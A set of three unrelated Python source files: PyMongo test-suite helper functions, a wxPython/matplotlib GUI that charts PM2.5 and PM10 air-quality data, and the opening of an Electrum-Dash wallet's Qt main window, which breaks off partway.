os.path.split(dirpath)[-1] for filename in filenames: with open(os.path.join(dirpath, filename)) as scenario_stream: # Use tz_aware=False to match how CodecOptions decodes # dates. opts = json_util.JSONOptions(tz_aware=False) scenario_def = ScenarioDict( json_util.loads(scenario_stream.read(), json_options=opts)) test_type = os.path.splitext(filename)[0] # Construct test from scenario. for test_def in self.tests(scenario_def): test_name = 'test_%s_%s_%s' % ( dirname, test_type.replace("-", "_").replace('.', '_'), str(test_def['description'].replace(" ", "_").replace( '.', '_'))) new_test = self._create_test( scenario_def, test_def, test_name) new_test = self._ensure_min_max_server_version( scenario_def, new_test) new_test = self.ensure_run_on( scenario_def, new_test) new_test.__name__ = test_name setattr(self._test_class, new_test.__name__, new_test) def _connection_string(h, authenticate): if h.startswith("mongodb://"): return h elif client_context.auth_enabled and authenticate: return "mongodb://%s:%s@%s" % (db_user, db_pwd, str(h)) else: return "mongodb://%s" % (str(h),) def _mongo_client(host, port, authenticate=True, direct=False, **kwargs): """Create a new client over SSL/TLS if necessary.""" host = host or client_context.host port = port or client_context.port client_options = client_context.default_client_options.copy() if client_context.replica_set_name and not direct: client_options['replicaSet'] = client_context.replica_set_name client_options.update(kwargs) client = MongoClient(_connection_string(host, authenticate), port, **client_options) return client def single_client_noauth(h=None, p=None, **kwargs): """Make a direct connection. Don't authenticate.""" return _mongo_client(h, p, authenticate=False, direct=True, **kwargs) def single_client(h=None, p=None, **kwargs): """Make a direct connection, and authenticate if necessary.""" return _mongo_client(h, p, direct=True, **kwargs) def rs_client_noauth(h=None, p=None, **kwargs): """Connect to the replica set. Don't authenticate.""" return _mongo_client(h, p, authenticate=False, **kwargs) def rs_client(h=None, p=None, **kwargs): """Connect to the replica set and authenticate if necessary.""" return _mongo_client(h, p, **kwargs) def rs_or_single_client_noauth(h=None, p=None, **kwargs): """Connect to the replica set if there is one, otherwise the standalone. Like rs_or_single_client, but does not authenticate. """ return _mongo_client(h, p, authenticate=False, **kwargs) def rs_or_single_client(h=None, p=None, **kwargs): """Connect to the replica set if there is one, otherwise the standalone. Authenticates if necessary. """ return _mongo_client(h, p, **kwargs) def ensure_all_connected(client): """Ensure that the client's connection pool has socket connections to all members of a replica set. Raises ConfigurationError when called with a non-replica set client. Depending on the use-case, the caller may need to clear any event listeners that are configured on the client. """ ismaster = client.admin.command("isMaster") if 'setName' not in ismaster: raise ConfigurationError("cluster is not a replica set") target_host_list = set(ismaster['hosts']) connected_host_list = set([ismaster['me']]) admindb = client.get_database('admin') # Run isMaster until we have connected to each host at least once. while connected_host_list != target_host_list: ismaster = admindb.command("isMaster", read_preference=ReadPreference.SECONDARY) connected_host_list.update([ismaster["me"]]) def one(s): """Get one element of a set""" return next(iter(s)) def oid_generated_on_process(oid): """Makes a determination as to whether the given ObjectId was generated by the current process, based on the 5-byte random number in the ObjectId. """ return ObjectId._random() == oid.binary[4:9] def delay(sec): return '''function() { sleep(%f * 1000); return true; }''' % sec def get_command_line(client): command_line = client.admin.command('getCmdLineOpts') assert command_line['ok'] == 1, "getCmdLineOpts() failed" return command_line def camel_to_snake(camel): # Regex to convert CamelCase to snake_case. snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel) return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower() def camel_to_upper_camel(camel): return camel[0].upper() + camel[1:] def camel_to_snake_args(arguments): for arg_name in list(arguments): c2s = camel_to_snake(arg_name) arguments[c2s] = arguments.pop(arg_name) return arguments def parse_collection_options(opts): if 'readPreference' in opts: opts['read_preference'] = parse_read_preference( opts.pop('readPreference')) if 'writeConcern' in opts: opts['write_concern'] = WriteConcern( **dict(opts.pop('writeConcern'))) if 'readConcern' in opts: opts['read_concern'] = ReadConcern( **dict(opts.pop('readConcern'))) return opts def server_started_with_option(client, cmdline_opt, config_opt): """Check if the server was started with a particular option. :Parameters: - `cmdline_opt`: The command line option (i.e. --nojournal) - `config_opt`: The config file option (i.e. nojournal) """ command_line = get_command_line(client) if 'parsed' in command_line: parsed = command_line['parsed'] if config_opt in parsed: return parsed[config_opt] argv = command_line['argv'] return cmdline_opt in argv def server_started_with_auth(client): try: command_line = get_command_line(client) except OperationFailure as e: msg = e.details.get('errmsg', '') if e.code == 13 or 'unauthorized' in msg or 'login' in msg: # Unauthorized. return True raise # MongoDB >= 2.0 if 'parsed' in command_line: parsed = command_line['parsed'] # MongoDB >= 2.6 if 'security' in parsed: security = parsed['security'] # >= rc3 if 'authorization' in security: return security['authorization'] == 'enabled' # < rc3 return security.get('auth', False) or bool(security.get('keyFile')) return parsed.get('auth', False) or bool(parsed.get('keyFile')) # Legacy argv = command_line['argv'] return '--auth' in argv or '--keyFile' in argv def server_started_with_nojournal(client): command_line = get_command_line(client) # MongoDB 2.6. if 'parsed' in command_line: parsed = command_line['parsed'] if 'storage' in parsed: storage = parsed['storage'] if 'journal' in storage: return not storage['journal']['enabled'] return server_started_with_option(client, '--nojournal', 'nojournal') def server_is_master_with_slave(client): command_line = get_command_line(client) if 'parsed' in command_line: return command_line['parsed'].get('master', False) return '--master' in command_line['argv'] def drop_collections(db): # Drop all non-system collections in this database. for coll in db.list_collection_names( filter={"name": {"$regex": r"^(?!system\.)"}}): db.drop_collection(coll) def remove_all_users(db): db.command("dropAllUsersFromDatabase", 1, writeConcern={"w": client_context.w}) def joinall(threads): """Join threads with a 5-minute timeout, assert joins succeeded""" for t in threads: t.join(300) assert not t.isAlive(), "Thread %s hung" % t def connected(client): """Convenience to wait for a newly-constructed client to connect.""" with warnings.catch_warnings(): # Ignore warning that "ismaster" is always routed to primary even # if client's read preference isn't PRIMARY. warnings.simplefilter("ignore", UserWarning) client.admin.command('ismaster') # Force connection. return client def wait_until(predicate, success_description, timeout=10): """Wait up to 10 seconds (by default) for predicate to be true. E.g.: wait_until(lambda: client.primary == ('a', 1), 'connect to the primary') If the lambda-expression isn't true after 10 seconds, we raise AssertionError("Didn't ever connect to the primary"). Returns the predicate's first true value. """ start = time.time() interval = min(float(timeout)/100, 0.1) while True: retval = predicate() if retval: return retval if time.time() - start > timeout: raise AssertionError("Didn't ever %s" % success_description) time.sleep(interval) def is_mongos(client): res = client.admin.command('ismaster') return res.get('msg', '') == 'isdbgrid' def assertRaisesExactly(cls, fn, *args, **kwargs): """ Unlike the standard assertRaises, this checks that a function raises a specific class of exception, and not a subclass. E.g., check that MongoClient() raises ConnectionFailure but not its subclass, AutoReconnect. """ try: fn(*args, **kwargs) except Exception as e: assert e.__class__ == cls, "got %s, expected %s" % ( e.__class__.__name__, cls.__name__) else: raise AssertionError("%s not raised" % cls) @contextlib.contextmanager def _ignore_deprecations(): with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) yield def ignore_deprecations(wrapped=None): """A context manager or a decorator.""" if wrapped: @functools.wraps(wrapped) def wrapper(*args, **kwargs): with _ignore_deprecations(): return wrapped(*args, **kwargs) return wrapper else: return _ignore_deprecations() class DeprecationFilter(object): def __init__(self, action="ignore"): """Start filtering deprecations.""" self.warn_context = warnings.catch_warnings() self.warn_context.__enter__() warnings.simplefilter(action, DeprecationWarning) def stop(self): """Stop filtering deprecations.""" self.warn_context.__exit__() self.warn_context = None def get_pool(client): """Get the standalone, primary, or mongos pool.""" topology = client._get_topology() server = topology.select_server(writable_server_selector) return server.pool def get_pools(client): """Get all pools.""" return [ server.pool for server in client._get_topology().select_servers(any_server_selector)] # Constants for run_threads and lazy_client_trial. NTRIALS = 5 NTHREADS = 10 def run_threads(collection, target): """Run a target function in many threads. target is a function taking a Collection and an integer. """ threads = [] for i in range(NTHREADS): bound_target = partial(target, collection, i) threads.append(threading.Thread(target=bound_target)) for t in threads: t.start() for t in threads: t.join(60) assert not t.isAlive() @contextlib.contextmanager def frequent_thread_switches(): """Make concurrency bugs more likely to manifest.""" interval = None if not sys.platform.startswith('java'): if hasattr(sys, 'getswitchinterval'): interval = sys.getswitchinterval() sys.setswitchinterval(1e-6) else: interval = sys.getcheckinterval() sys.setcheckinterval(1) try: yield finally: if not sys.platform.startswith('java'): if hasattr(sys, 'setswitchinterval'): sys.setswitchinterval(interval) else: sys.setcheckinterval(interval) def lazy_client_trial(reset, target, test, get_client): """Test concurrent operations on a lazily-connecting client. `reset` takes a collection and resets it for the next trial. `target` takes a lazily-connecting collection and an index from 0 to NTHREADS, and performs some operation, e.g. an insert. `test` takes the lazily-connecting collection and asserts a post-condition to prove `target` succeeded. """ collection = client_context.client.pymongo_test.test with frequent_thread_switches(): for i in range(NTRIALS): reset(collection) lazy_client = get_client() lazy_collection = lazy_client.pymongo_test.test run_threads(lazy_collection, target) test(lazy_collection) def gevent_monkey_patched(): """Check if gevent's monkey patching is active.""" # In Python 3.6 importing gevent.socket raises an ImportWarning. with warnings.catch_warnings(): warnings.simplefilter("ignore", ImportWarning) try: import socket import gevent.socket return socket.socket is gevent.socket.socket except ImportError: return False def eventlet_monkey_patched(): """Check if eventlet's monkey patching is active.""" try: import threading import eventlet return (threading.current_thread.__module__ == 'eventlet.green.threading') except ImportError: return False def is_greenthread_patched(): return gevent_monkey_patched() or eventlet_monkey_patched() def disable_replication(client): """Disable replication on all secondaries, requires MongoDB 3.2.""" for host, port in client.secondaries: secondary = single_client(host, port) secondary.admin.command('configureFailPoint', 'stopReplProducer', mode='alwaysOn') def enable_replication(client): """Enable replication on all secondaries, requires MongoDB 3.2.""" for host, port in client.secondaries: secondary = single_client(host, port) secondary.admin.command('configureFailPoint', 'stopReplProducer', mode='off') class ExceptionCatchingThread(threading.Thread): """A thread that stores any exception encountered from run().""" def __init__(self, *args, **kwargs): self.exc = None super(ExceptionCatchingThread, self).__init__(*args, **kwargs) def run(self): try: super(ExceptionCatchingThread, self).run() except BaseException as exc: self.exc = exc raise
myAQIGUI.py
#!/usr/bin/env python # -*- coding: utf-8 -*- ########################################################################### ## Python code generated with wxFormBuilder (version Jun 17 2015) ## http://www.wxformbuilder.org/ ## ## PLEASE DO "NOT" EDIT THIS FILE! ########################################################################### import wx import wx.xrc from wx.lib.newevent import NewCommandEvent TimerChangeEvent, EVT_TIMER_CHANGE = NewCommandEvent() DisplayUpdate, EVT_DISP_UPDATE = wx.lib.newevent.NewEvent() import numpy as np import matplotlib from matplotlib import dates from datetime import datetime,timedelta import time # matplotlib采用WXAgg为后台,将matplotlib嵌入wxPython中 matplotlib.use("WXAgg") from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas from matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg as NavigationToolbar from matplotlib.ticker import MultipleLocator, FuncFormatter import pylab from matplotlib import pyplot import dataCollect from Queue import Queue, Empty from threading import Thread EVENT_TIMER = 'eTimer' ########################################################################### ## Event type ########################################################################### class Event(object): #---------------------------------------------------------------------- def __init__(self, handle, type_=None): """Constructor""" self.handle = handle self.type_ = type_ class MainFrame ( wx.Frame ): def __init__( self, parent ): wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"MyAQI", \ pos = wx.DefaultPosition, size = wx.Size( 800,400 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL ) ##################################################### # Manual Add Code self.dpi = 100 # self.Figure = matplotlib.figure.Figure(figsize=(10,3), dpi=self.dpi) self.Figure = matplotlib.figure.Figure(figsize=(50,30)) self.Figure.set_facecolor('white') # self.axes = self.Figure.add_axes([0.1,0.1,0.8,0.8]) self.axes25 = self.Figure.add_subplot(111) self.axes10 = self.axes25.twinx() self.FigureCanvas = FigureCanvas(self,-1,self.Figure) ##################################################### self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) self.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) ) # self.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) ) MainSizer = wx.FlexGridSizer( 1, 3, 0, 0 ) MainSizer.SetFlexibleDirection( wx.BOTH ) MainSizer.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_ALL ) leftSizer = wx.FlexGridSizer( 11, 1, 0, 0 ) leftSizer.SetFlexibleDirection( wx.BOTH ) leftSizer.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_ALL ) self.m_staticText1 = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText1.Wrap( -1 ) leftSizer.Add( self.m_staticText1, 0, wx.ALL | wx.EXPAND, 5 ) self.m_btn_start = wx.Button( self, wx.ID_ANY, u"Start", wx.DefaultPosition, wx.DefaultSize, 0 ) leftSizer.Add( self.m_btn_start, 0, wx.ALL | wx.EXPAND, 5 ) self.m_staticText2 = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText2.Wrap( -1 ) leftSizer.Add( self.m_staticText2, 0, wx.ALL | wx.EXPAND, 5 ) self.m_btn_stop = wx.Button( self, wx.ID_ANY, u"Stop", wx.DefaultPosition, wx.DefaultSize, 0 ) leftSizer.Add( self.m_btn_stop, 0, wx.ALL | wx.EXPAND, 5 ) self.m_staticText3 = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText3.Wrap( -1 ) leftSizer.Add( self.m_staticText3, 0, wx.ALL | wx.EXPAND, 5 ) self.m_btn_quit = wx.Button( self, wx.ID_ANY, u"Quit", wx.DefaultPosition, wx.DefaultSize, 0 ) leftSizer.Add( self.m_btn_quit, 0, wx.ALL | wx.EXPAND, 5 ) self.m_staticText4 = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText4.Wrap( -1 ) leftSizer.Add( self.m_staticText4, 0, wx.ALL | wx.EXPAND, 5 ) self.m__staticPM25label = wx.StaticText( self, wx.ID_ANY, u"PM2.5", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m__staticPM25label.Wrap( -1 ) leftSizer.Add( self.m__staticPM25label, 0, wx.ALL, 5 ) self.m_textPM25 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 40,-1 ), style =wx.TE_RIGHT ) leftSizer.Add( self.m_textPM25, 0, wx.ALL, 5 ) self.m_staticPM10label = wx.StaticText( self, wx.ID_ANY, u"PM10", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticPM10label.Wrap( -1 ) leftSizer.Add( self.m_staticPM10label, 0, wx.ALL, 5 ) self.m_textPM10 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 40,-1 ), style =wx.TE_RIGHT ) leftSizer.Add( self.m_textPM10, 0, wx.ALL, 5 ) MainSizer.Add( leftSizer, 1, wx.ALL | wx.EXPAND, 5 ) self.m_staticline1 = wx.StaticLine( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_VERTICAL ) MainSizer.Add( self.m_staticline1, 0, wx.EXPAND | wx.ALL, 5 ) MainSizer.Add(self.FigureCanvas,proportion =-10, border = 2,flag = wx.ALL | wx.GROW) self.SetSizer( MainSizer ) self.Layout() self.timer = wx.Timer() self.timer.SetOwner( self, wx.ID_ANY ) self.Centre( wx.BOTH ) # Connect Events self.m_btn_start.Bind( wx.EVT_BUTTON, self.onStart ) self.m_btn_stop.Bind( wx.EVT_BUTTON, self.onStop ) self.m_btn_quit.Bind( wx.EVT_BUTTON, self.onQuit ) self.Bind( wx.EVT_TIMER, self.onTimer, id=wx.ID_ANY ) # Timer event self.Bind(EVT_TIMER_CHANGE, self.onChangeTimer) #customer event self.Bind(EVT_DISP_UPDATE, self.onDisplayUpdate) # Create object for AQI data self.tickerData = dataCollect.AQIdata2() # initial plot the graphy here, only need to update data later # self.plot(self.tickerData.xTicker,self.tickerData.y25Ticker, '--+r', self.tickerData.xTicker,self.tickerData.y10Ticker,'--*g') self.plot_data25 = self.axes25.plot(self.tickerData.xTicker,self.tickerData.y25Ticker,'-sr')[0] self.plot_data10 = self.axes10.plot(self.tickerData.xTicker,self.tickerData.y10Ticker,'-dg')[0] self.axes25.set_axis_bgcolor('gray') self.axes25.set_ybound(lower=0, upper=500) self.axes10.set_ybound(lower=0, upper=500) # hfmt = dates.DateFormatter('%m/%d %H:%M') hfmt = dates.DateFormatter('%H:%M') # self.axes25.xaxis.set_major_locator(dates.MinuteLocator()) self.axes25.xaxis.set_major_locator(dates.HourLocator()) self.axes25.xaxis.set_major_formatter(hfmt) # self.axes10.xaxis.set_major_locator(dates.MinuteLocator()) self.axes25.xaxis.set_major_locator(dates.HourLocator()) self.axes10.xaxis.set_major_formatter(hfmt) # self.axes25.get_xticklabels(), fontsize=8) # self.axes25.get_yticklabels(), fontsize=8) # self.axes10.get_xticklabels(), fontsize=8) # self.axes10.get_yticklabels(), fontsize=8) self.sleepTime = 10 # 10 second delay self.maxDatalen = 100000 #max 10E5 point self.__queue = Queue() self.__active = False def __del__( self ): self.timer.Stop() if self.__active == True: self.__active = False self.__thread.join() # Virtual event handlers, overide them in your derived class def onStart( self, event ): self.__Start() def __Start(self): self.timer.Start(self.sleepTime) if self.__active == False: self.__thread = Thread(target = self.__run) self.__active = True self.__thread.start() def onStop( self, event ): self.__Stop() def __Stop(self): self.timer.Stop() if self.__active == True: self.__active = False self.__thread.join() def post_timer_change_event(self, value): ''' create a change timer event ''' evt = TimerChangeEvent(self.Id, value=value) wx.PostEvent(self, evt) def onChangeTimer(self, event): value = event.value self.timer.Start(value) def onQuit( self, event ): self.timer.Stop() if self.__active == True: self.__active = False self.__thread.join() self.Close() def onTimer( self, event ): event_ = Event(self.updateGraphy, type_=EVENT_TIMER) self.__queue.put(event_) def updateGraphy(self): evt = DisplayUpdate() wx.PostEvent(self, evt) def onDisplayUpdate(self, event): nplen = len(self.tickerData.xTicker) if nplen>self.maxDatalen: for i in range((nplen/2)): self.tickerData.xTicker = np.delete(self.tickerData.xTicker, i+1, 0) self.tickerData.y25Ticker = np.delete(self.tickerData.y25Ticker, i+1, 0) self.tickerData.y10Ticker = np.delete(self.tickerData.y10Ticker, i+1, 0) self.sleepTime = self.sleepTime *2 self.post_timer_change_event(self.sleepTime) self.tickerData.updateElement(self.sleepTime) self.m_textPM10.SetValue(str(int(self.tickerData.y10Ticker[-1]))) self.m_textPM25.SetValue(str(int(self.tickerData.y25Ticker[-1]))) self.__plot() def __run(self): while self.__active == True: try: event_ = self.__queue.get(block = True, timeout = 1) self.__process(event_) except Empty: pass def __process(self, event_): event_.handle() def __plot(self,*args,**kwargs): '''update the plot here''' # how to change the x axis to time format dts = map(datetime.fromtimestamp, self.tickerData.xTicker) fds = dates.date2num(dts) # converted xmin = fds[0] xmax = fds[-1]+0.001 diff = dts[-1]-dts[0] ymin = 0 ymax = max(max(self.tickerData.y25Ticker), max(self.tickerData.y10Ticker))*1.5 self.axes25.set_xbound(lower=xmin, upper=xmax) self.axes25.set_ybound(lower=ymin, upper=ymax) self.axes10.set_xbound(lower=xmin, upper=xmax) self.axes10.set_ybound(lower=ymin, upper=ymax) # X axis format setting if diff < timedelta(minutes=20): hfmt = dates.DateFormatter('%H:%M') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.MinuteLocator(byminute=range(60), interval=2)) self.axes25.xaxis.set_minor_locator(dates.MinuteLocator(interval=1)) elif diff < timedelta(hours=1): hfmt = dates.DateFormatter('%H:%M') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.MinuteLocator(byminute=range(60), interval=5)) self.axes25.xaxis.set_minor_locator(dates.MinuteLocator(interval=2)) elif diff < timedelta(hours=6): hfmt = dates.DateFormatter('%H:%M') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.MinuteLocator(interval=30)) self.axes25.xaxis.set_minor_locator(dates.MinuteLocator(interval=10)) elif diff < timedelta(days=2): hfmt = dates.DateFormatter('%H:%M') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.HourLocator(interval=4)) self.axes25.xaxis.set_minor_locator(dates.HourLocator(interval=1)) elif diff < timedelta(days=10): hfmt = dates.DateFormatter('%m/%d') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.DayLocator(interval=1)) self.axes25.xaxis.set_minor_locator(dates.HourLocator(interval=6)) elif diff < timedelta(days=40): hfmt = dates.DateFormatter('%m/%d') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.DayLocator(interval=2)) self.plot_data25.set_xdata(fds) self.plot_data25.set_ydata(self.tickerData.y25Ticker) self.plot_data10.set_xdata(fds) self.plot_data10.set_ydata(self.tickerData.y10Ticker) xlabels = self.axes25.get_xticklabels() for xl in xlabels: xl.set_rotation(45) self.__updatePlot() def __updatePlot(self): '''''need to use this function update graphy if any data updated ''' self.FigureCanvas.draw() if __name__ == '__main__': app = wx.App() # wx.InitAllImageHandlers() frame = MainFrame(None) app.SetTopWindow(frame) frame.Show() app.MainLoop()
main_window.py
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sys import time import threading import os import traceback import json import shutil import weakref import csv from decimal import Decimal import base64 from functools import partial import queue import asyncio from typing import Optional from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, pyqtSlot from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget, QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel, QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem, QHBoxLayout, QPushButton, QScrollArea, QTextEdit, QShortcut, QMainWindow, QCompleter, QInputDialog, QWidget, QMenu, QSizePolicy, QStatusBar, QAction) import electrum_dash from electrum_dash import (keystore, simple_config, ecc, constants, util, bitcoin, commands, coinchooser, paymentrequest) from electrum_dash.bitcoin import COIN, is_address, TYPE_ADDRESS from electrum_dash.dash_tx import DashTxError from electrum_dash.plugin import run_hook from electrum_dash.i18n import _ from electrum_dash.util import (format_time, format_satoshis, format_fee_satoshis, format_satoshis_plain, NotEnoughFunds, UserCancelled, NoDynamicFeeEstimates, profiler, export_meta, import_meta, bh2u, bfh, InvalidPassword, base_units, base_units_list, base_unit_name_to_decimal_point, decimal_point_to_base_unit_name, quantize_feerate, UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException, get_new_wallet_name, send_exception_to_crash_reporter, InvalidBitcoinURI) from electrum_dash.transaction import Transaction, TxOutput from electrum_dash.address_synchronizer import AddTransactionException from electrum_dash.wallet import (Multisig_Wallet, Abstract_Wallet, sweep_preparations, InternalAddressCorruption) from electrum_dash.version import ELECTRUM_VERSION from electrum_dash.network import Network, TxBroadcastError, BestEffortRequestFailed from electrum_dash.exchange_rate import FxThread from electrum_dash.simple_config import SimpleConfig from electrum_dash.logging import Logger from electrum_dash.paymentrequest import PR_PAID from electrum_dash.base_crash_reporter import BaseCrashReporter from electrum_dash.masternode_manager import MasternodeManager from .exception_window import Exception_Hook from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .fee_slider import FeeSlider from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog, WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons, OkButton, InfoButton, WWLabel, TaskThread, CancelButton, CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values, ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui, filename_field, address_field, char_width_in_lineedit, webopen) from .installwizard import WIF_HELP_TEXT from .history_list import HistoryList, HistoryModel from .update_checker import UpdateCheck, UpdateCheckThread from .masternode_dialog import MasternodeDialog from .dash_qt import ExtraPayloadWidget from .protx_qt import create_dip3_tab class StatusBarButton(QPushButton): def __init__(self, icon, tooltip, func): QPushButton.__init__(self, icon, '') self.setToolTip(tooltip) self.setFlat(True) self.setMaximumWidth(31) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) self.setCursor(QCursor(Qt.PointingHandCursor)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() == Qt.Key_Return: self.func() class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() new_fx_quotes_signal = pyqtSignal() new_fx_history_signal = pyqtSignal() network_signal = pyqtSignal(str, object) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() def __init__(self, gui_object, wallet: Abstract_Wallet): QMainWindow.__init__(self) self.setObjectName("main_window_container") self.masternode_manager = None self.gui_object = gui_object self.config = config = gui_object.config # type: SimpleConfig self.gui_thread = gui_object.gui_thread self._old_excepthook = None self.setup_exception_hook() self.network = gui_object.daemon.network # type: Network assert wallet, "no wallet" self.wallet = wallet self.fx = gui_object.daemon.fx # type: FxThread self.invoices = wallet.invoices self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self.cleaned_up = False self.payment_request = None # type: Optional[paymentrequest.PaymentRequest] self.checking_accounts = False self.qr_window = None self.not_enough_funds = False self.pluginsdialog = None self.require_fee_update = False self.tl_windows = [] self.tx_external_keypairs = {} Logger.__init__(self) self.tx_notification_queue = queue.Queue() self.tx_notification_last_time = 0 self.create_status_bar() self.need_update = threading.Event() self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT) try: decimal_point_to_base_unit_name(self.decimal_point) except UnknownBaseUnit: self.decimal_point = DECIMAL_POINT_DEFAULT self.num_zeros = int(config.get('num_zeros', 8)) self.completions = QStringListModel() self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.dip3_tab = create_dip3_tab(self, wallet) self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() # Disabled until API is stable. # tabs.addTab(self.create_proposals_tab(), _('Budget Proposals')) tabs.setMinimumSize(1020, 500) tabs.setObjectName("main_window_nav_bar") tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History')) tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses") add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.dip3_tab, read_QIcon("tab_dip3.png"), _("&DIP3"), "dip3") add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) self.setCentralWidget(tabs) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum-pac.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+M"), self, self.show_masternode_dialog) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) # self.connect(self, QtCore.SIGNAL('proposals_changed'), self.proposals_changed) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) self.gui_object.dash_net_sobj.main.connect(self.on_dash_net_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram'] # 'proposals'] # To avoid leaking references to "self" that prevent the # 